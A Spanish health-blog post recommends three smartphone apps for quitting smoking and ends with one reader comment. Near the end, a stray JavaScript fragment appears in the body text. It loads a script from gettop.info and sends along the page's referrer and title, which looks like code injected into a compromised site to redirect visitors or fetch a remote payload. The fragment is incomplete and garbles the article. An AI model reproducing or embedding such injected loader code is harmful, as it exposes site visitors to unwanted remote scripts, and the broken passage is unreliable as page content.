Salud y belleza » Enfermedades, Salud

Las mejores aplicaciones para dejar de fumar

1 Comentario

app-dejar-de-fumarA menudo para dejar de fumar no sobra alguna ayuda extra. Pero no solo hablamos de chicles de nicotina o de apoyo familiar. Con las nuevas tecnologías, tu smartphone también puede ayudarte a dejar de fumar. Por eso te proponemos algunas aplicaciones muy útiles que te ayudarán a dejar de fumar. Estas apps incluyen, entre otras cosas, información y testimonios de exfumadores y terapias para conseguir abandonar este insalubre hábito.

Respirapp: una aplicación de la Asociación Española Contra el Cáncer que sirve de guía, orientación y apoyo en cuatro fases. Con esta aplicación aseguran que ayudas a evitar las ganas de fumar, reduces la ansiedad y controlas el aumento de peso. Además, si te cuesta mucho dejar de fumar puedes acceder directamente al consultorio con profesionales.

respirapp

NicoStopper: como un entrenador personal pero que te ayuda a controlar y abandonar el hábito de fumar. Se basa en terapias psicológicas y alternativas y tiene varios programas diferentes para reducir paulatinamente la dependencia de la nicotina. Tres de los programas son para abandonar la adicción y uno de ellos es de autocontrol. Cuenta con un aparato de autoayuda y un calendario para que puedas ir siguiendo todos tus progresos.

nicostopper

Quit Now!: se trata de una de las aplicaciones, de las tres que te hemos dicho, más completas. Tiene una especie de cuenta del tiempo que llevas sin fumar y todas las ventajas que puedes disfrutar por ello. Te cuenta el número de cigarros que no has consumido, el tiempo de vida que has ganado y el dinero que has ahorrado. Todo un programa de motivación para seguir sin fumar. Por otro lado, cuenta con un foro para recibir consejos y ayuda de otras personas que estén en tu misma situación o que hayan pasado por ella.

quit-now-app

¿Has probado alguna de estas aplicaciones para dejar de fumar?

} else {s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

One Comment »

  • Alhambra said:

    Buen consejo, gracias por la información, lo estaba buscando.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.